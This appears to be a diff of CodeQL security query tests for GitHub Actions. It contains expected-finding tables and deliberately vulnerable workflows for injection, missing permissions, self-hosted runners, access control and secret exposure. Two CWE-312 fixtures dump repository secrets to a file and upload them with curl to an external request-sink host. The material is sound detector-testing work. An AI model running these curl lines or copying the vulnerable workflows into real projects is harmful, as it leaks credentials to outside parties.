| +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | semmle.label | Job outputs node [chart-version] | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | semmle.label | steps.get-version.outputs.chart_version | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | +| .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$( + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected new file mode 100644 index 000000000000..259746eaec9a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref new file mode 100644 index 000000000000..cd179c0f1e6b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -0,0 +1,2 @@ +Security/CWE-200/SecretExfiltration.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml new file mode 100644 index 000000000000..f000ad6a287a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml @@ -0,0 +1,10 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml new file mode 100644 index 000000000000..6f7844f17cb2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -0,0 +1,16 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + test: + name: Build and test + runs-on: ubuntu-latest + permissions: {} + steps: + - uses: actions/checkout@v2 + diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml new file mode 100644 index 000000000000..b34dfeec641c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml @@ -0,0 +1,13 @@ +on: + pull_request + +permissions: {} + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml new file mode 100644 index 000000000000..16930cfb07c8 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml @@ -0,0 +1,11 @@ +on: + workflow_call: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml new file mode 100644 index 000000000000..4353c2804976 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -0,0 +1,12 @@ +on: + workflow_call: + workflow_dispatch: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected new file mode 100644 index 000000000000..8f94d0dc45a6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -0,0 +1,3 @@ +| .github/workflows/perms1.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms2.yml:6:5:10:2 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms5.yml:7:5:10:32 | Job: build | Actions Job or Workflow does not set permissions | diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref new file mode 100644 index 000000000000..ad1c6a996609 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -0,0 +1,2 @@ +Security/CWE-275/MissingActionsPermissions.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml new file mode 100644 index 000000000000..37eb2bddb58c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -0,0 +1,94 @@ +name: test + +on: + pull_request: + +jobs: + test1: + runs-on: [self-hosted, X64, Linux, 16c32g] + steps: + - run: cmd + test2: + runs-on: + group: my-group + labels: [self-hosted, label-1] + steps: + - run: cmd + test3: + runs-on: + - 'self-hosted' + - 'linux' + - 'x64' + - 'metal' + steps: + - run: echo "foo" + test4: + runs-on: self-hosted-azure + steps: + - run: cmd + test5: + strategy: + fail-fast: false + matrix: + platform: + - name: Linux + os: ubuntu-latest + shell: bash + - name: macOS + os: macos-latest + shell: bash + - name: Windows + os: windows-latest + shell: cmd + node-version: + - 16.14.0 + - 16.x + - 18.0.0 + - 18.x + - 20.x + runs-on: ${{ matrix.platform.os }} + steps: + - run: cmd + test6: + strategy: + matrix: + os: [ubuntu-latest, macos-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test7: + strategy: + matrix: + os: [self-hosted, ubuntu-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test8: + strategy: + matrix: + settings: + - host: + - 'self-hosted' + - 'macos' + - 'arm64' + target: 'x86_64-apple-darwin' + runs-on: ${{ matrix.settings.host }} + steps: + - run: cmd + test9: + strategy: + matrix: + os: ${{ github.repository }} + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test10: + strategy: + matrix: + os: ${{ github.repository }} + foo: + - bar: ${{ github.repository }} + baz: "asdf" + runs-on: ${{ matrix.foo.bar }} + steps: + - run: cmd diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml new file mode 100644 index 000000000000..243bac925994 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml @@ -0,0 +1,26 @@ +name: test + +on: + push: + +jobs: + test1: + runs-on: [self-hosted, foo] + steps: + - run: cmd + test2: + runs-on: + group: my-group + labels: [self-hosted, foo] + steps: + - run: cmd + test3: + runs-on: + - 'self-hosted' + - 'foo' + steps: + - run: cmd + test4: + runs-on: self-hosted-azure + steps: + - run: cmd diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected new file mode 100644 index 000000000000..306bed9baec1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected @@ -0,0 +1,8 @@ +| .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:26:5:29:2 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:60:5:66:2 | Job: test7 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:67:5:78:2 | Job: test8 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:79:5:85:2 | Job: test9 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:86:5:94:15 | Job: test10 | Job runs on self-hosted runner | diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref new file mode 100644 index 000000000000..43692e5ce43a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -0,0 +1,2 @@ +Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml new file mode 100644 index 000000000000..48833460b44b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml new file mode 100644 index 000000000000..be6a6cf39395 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ labeled ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected new file mode 100644 index 000000000000..92f87dc1f35b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -0,0 +1 @@ +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be modified after the authorization check $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref new file mode 100644 index 000000000000..09a19f21e3cb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -0,0 +1,2 @@ +Security/CWE-285/ImproperAccessControl.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml new file mode 100644 index 000000000000..80f98bd57afc --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml @@ -0,0 +1,19 @@ +name: secrets +on: + workflow_dispatch: +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ secrets.TOKEN }}' > secrets.txt + curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com + - env: + A_SECRET: ${{ secrets.TOKEN }} + run: echo "$A_SECRET" + - env: + A_SECRET: ${{ secrets['TOKEN'] }} + run: echo "$A_SECRET" + - env: + A_SECRET: ${{ secrets["TOKEN"] }} + run: echo "$A_SECRET" diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml new file mode 100644 index 000000000000..473d59986957 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -0,0 +1,87 @@ +name: secrets-in-artifacts +on: + pull_request: +jobs: + test1: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + test2: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@v4 + with: + name: file + path: . + test3: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: "*" + test4: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo + test5: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo/* + test6: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: pr + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo + test7: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + test8: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml new file mode 100644 index 000000000000..614efab34c98 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml @@ -0,0 +1,25 @@ +name: list-actions-secrets +on: + workflow_dispatch: +jobs: + build: + runs-on: ubuntu-latest + strategy: + matrix: + TOKENS: [WRITE, READ] + steps: + - run: | + echo '${{ toJSON(secrets) }}' > secrets.txt + curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com + - env: + ALL_SECRETS: ${{ toJSON(secrets) }} + run: echo "$ALL_SECRETS" + - env: + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} + run: echo "$SOME_SECRETS" + - env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected new file mode 100644 index 000000000000..9d6a741ed58f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected @@ -0,0 +1,3 @@ +| .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | secrets[format('PAT_%s', matrix.TOKENS)] | diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref new file mode 100644 index 000000000000..45f5ad80fd98 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/ExcessiveSecretsExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected new file mode 100644 index 000000000000..0acb306b9d6f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -0,0 +1,5 @@ +| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | actions/upload-artifact | diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref new file mode 100644 index 000000000000..c9bb538a12d3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/SecretsInArtifacts.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected new file mode 100644 index 000000000000..4f309344b4bc --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected @@ -0,0 +1,2 @@ +| .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | fromJson(secrets.AZURE_CREDENTIALS).clientId | +| .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | diff --git 